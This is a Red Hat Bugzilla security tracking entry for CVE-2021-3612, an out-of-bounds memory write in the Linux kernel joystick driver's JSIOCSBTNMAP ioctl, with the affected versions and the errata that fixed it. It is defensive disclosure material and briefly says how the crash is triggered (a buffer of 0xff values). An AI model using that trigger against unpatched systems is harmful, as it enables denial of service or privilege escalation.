Bug 1974079 (CVE-2021-3612)

Summary: CVE-2021-3612 kernel: joydev: zero size passed to joydev_handle_JSIOCSBTNMAP()
Product: [Other] Security Response Reporter: Alex <allarkin>
Component: vulnerabilityAssignee: Red Hat Product Security <security-response-team>
Status: CLOSED ERRATA QA Contact:
Severity: medium Docs Contact:
Priority: medium    
Version: unspecifiedCC: acaringi, adscvr, airlied, alciregi, bhu, blc, brdeoliv, bskeggs, chwhite, crwood, dhoward, dvlasenk, fhrbata, fpacheco, hdegoede, hkrzesin, jarod, jarodwilson, jeremy, jforbes, jlelli, jonathan, josef, jshortt, jstancek, jwboyer, kcarcia, kernel-maint, kernel-mgr, lgoncalv, linville, masami256, mchehab, mlangsdo, nmurray, ptalbert, qzhao, rvrbovsk, steved, walters, wcosta, williams
Target Milestone: ---Keywords: Security
Target Release: ---   
Hardware: All   
OS: Linux   
Whiteboard:
Fixed In Version: kernel 5.9-rc1 Doc Type: If docs needed, set a value
Doc Text:
An out-of-bounds memory write flaw was found in the Linux kernel’s joystick devices subsystem, in the way the user calls ioctl JSIOCSBTNMAP. This flaw allows a local user to crash the system or possibly escalate their privileges on the system. The highest threat from this vulnerability is to confidentiality, integrity, as well as system availability.
 Story Points: ---
Clone Of: Environment:
Last Closed: 2022-05-11 07:15:33 UTC Type: ---
Regression: --- Mount Type: ---
Documentation: --- CRM:
Verified Versions: Category: ---
oVirt Team: --- RHEL 7.3 requirements from Atomic Host:
Cloudforms Team: --- Target Upstream Version:
Embargoed:
Bug Depends On: 1974723, 1974724, 1974726, 1974727, 1974080, 1974087, 1974088, 1974089, 1974090, 1974091, 1974102    
Bug Blocks: 1966365, 1974465    

Description Alex 2021-06-20 12:44:00 UTC 
If using ioctl JSIOCSBTNMAP (ex. for device /dev/input/js0) with incorrect input data (ex. buffer filled with values 0xff), then Linux kernel module crash (panic) happens with memory writing out of bounds.
Bug exists in kernels after patch 182d679b2298 (ref. https://lore.kernel.org/linux-input/20210219083215.GS2087@kadam/ , so starting from upstream v5.12-rc1 ). Before this patch (before v5.12-rc1 ), bug existed too, but there was only possibility of reading out of stack that was less dangerous.
Comment 1 Alex 2021-06-20 12:44:57 UTC 
Created kernel tracking bugs for this issue:

Affects: fedora-all [bug 1974080]
Comment 2 Alex 2021-06-20 13:23:58 UTC 
Since the patch
https://lore.kernel.org/linux-input/20210219083215.GS2087@kadam/
not applied yet for any of the Red Hat Enterprise Linux, for the all versions of Red Hat Enterprise Linux only read of memory out of bounds possible (and both in most cases it requires some privileges, because module CONFIG_INPUT_JOYDEV not being used by default, so no any devices like /dev/input/js* and as result not possible to trigger the bug before enabling the device driver).
Comment 11 errata-xmlrpc 2022-05-10 14:39:03 UTC 
This issue has been addressed in the following products:

  Red Hat Enterprise Linux 8

Via RHSA-2022:1975 https://access.redhat.com/errata/RHSA-2022:1975
Comment 12 errata-xmlrpc 2022-05-10 14:44:44 UTC 
This issue has been addressed in the following products:

  Red Hat Enterprise Linux 8

Via RHSA-2022:1988 https://access.redhat.com/errata/RHSA-2022:1988
Comment 13 Product Security DevOps Team 2022-05-11 07:15:29 UTC 
This bug is now closed. Further updates for individual products will be reflected on the CVE page(s):

https://access.redhat.com/security/cve/cve-2021-3612